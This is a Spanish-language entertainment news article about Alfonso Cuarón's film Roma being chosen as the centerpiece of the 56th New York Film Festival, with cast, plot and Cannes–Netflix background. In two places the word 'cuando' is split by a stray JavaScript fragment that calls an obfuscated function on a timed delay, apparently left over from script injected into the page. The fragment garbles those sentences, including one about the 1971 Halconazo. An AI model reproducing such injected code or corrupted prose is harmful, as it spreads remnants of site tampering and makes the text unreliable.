Alfonso Cuarón estrenará Roma durante el Festival de Cine de Nueva York

    Alfonso Cuarón estrenará Roma durante el Festival de Cine de Nueva York

    Roma será la pieza central en el marco de la edición 56 del certamen fílmico.

    Autor: Redacción Maxim 19 julio, 2018


     

    Fotografía por Carlos Somonte / Netflix.

     

    Cuarón no pudo estrenar Roma en Cannes, pero será la pieza central del Festival de Cine de Nueva York

     

    Este 18 de julio  la Film Society of Lincoln Center  anunció que la película Roma, del director mexicano Alfonso Cuarón, será la pieza central de la edición 56 del Festival de Cine de Nueva York, que se llevará a cabo del 28 de septiembre al 14 de octubre.

     

     

     

     

    Al respecto, Cuarón comentó:

     

    «Me siento honrado de que Roma haya sido seleccionada para el puesto de la pieza central en el Festival de Cine de Nueva York de este año… (el festival) tiene una larga historia de celebrar cinematografía significativa y convincente, y me pareció correcto regresar al festival con un proyecto increíblemente personal, esclarecedor y transformador para mí».

     

     

     

     

    Roma es una cinta con tintes autobiográficos del director mexicano. Cuarón escribió, dirigió y produjo este filme ambientado en la Ciudad de México a principios de los años 70,  en el  que nos lleva al seno de una familia de clase media y su ama de llaves.

     

     

     

    Todos esperábamos ver algo del nuevo trabajo de Cuarón en mayo, no obstante, luego de la polémica que se suscitó cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el Festival Internacional de Cine de Cannes añadió trabas para la participación de las películas producidas por las plataformas de streaming.

     

    Por esta razón Netflix decidió no presentar  numerosas cintas en la competencia (entre ellas Roma), tuvimos que hacer más larga la espera. Afortunadamente la veremos muy pronto en las salas.

     

     

    Esta película también retratará los acontecimientos  del 10 de junio de 1971, conocidos en México como «El Halconazo», cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando un grupo paramilitar bajo las órdenes del gobierno llamado «Halcones»,  reprimió violentamente a una manifestación de estudiantes, en la que más de 100 personas perdieron la vida.

     

     

    El elenco está integrado por Yalitza Aparicio, Marina de Tavira, Marco Graf, Daniela Demesa, Enoc Leaño y Daniel Valtierra. La cinta se desenvolverá en la vida cotidiana mientras nos lleva por una vibrante experiencia cinematográfica rodada en blanco y negro.

     

    via GIPHY

     

     

    ¡Ya queremos ver el trabajo del director mexicano!

     

    Temas relacionados con esta nota: , , , ,

Roma será la pieza central en el marco de la edición 56 del certamen fílmico.